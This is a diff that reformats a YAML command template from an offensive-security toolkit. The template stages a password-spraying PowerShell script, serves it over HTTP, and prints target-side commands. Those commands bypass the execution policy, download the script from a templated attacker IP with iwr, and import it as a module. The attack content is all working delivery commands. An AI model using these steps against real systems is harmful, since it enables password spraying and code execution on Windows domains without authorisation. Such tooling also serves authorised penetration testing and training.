--- a/src/profi/templates/scripts/deliver-windows-spray-passwords.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-spray-passwords.ps1.yaml
@@ -1,18 +1,17 @@
+---
 metadata:
-  filename: deliver-windows-spray-passwords.ps1.yaml
-  tags:
-  - windows
-  - domain
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; cp -n {{ templates_dir }}/helper_scripts/spray-passwords.ps1\
-  \ packstation/outbound; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Preparation: powershell -ep bypass'; \\\necho 'Deliver & Import: iwr -uri\
-  \ http://{{ attacker_ip }}:{{ delivery_outbound_port }}/spray-passwords.ps1 -Outfile\
-  \ {{ delivery_path_windows }}\\spray-passwords.ps1; Import-Module {{ delivery_path_windows\
-  \ }}\\spray-passwords.ps1'; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho '================================================================'; \\\n\
-  \ python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port\
-  \ }} -d packstation/outbound\n"
+  filename: "deliver-windows-spray-passwords.ps1.yaml"
+  tags: ["windows", "domain"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; cp -n {{ templates_dir }}/helper_scripts/spray-passwords.ps1 packstation/outbound; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Preparation: powershell -ep bypass'; \
+  echo 'Deliver & Import: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/spray-passwords.ps1 -Outfile {{ delivery_path_windows }}\spray-passwords.ps1; Import-Module {{ delivery_path_windows }}\spray-passwords.ps1'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
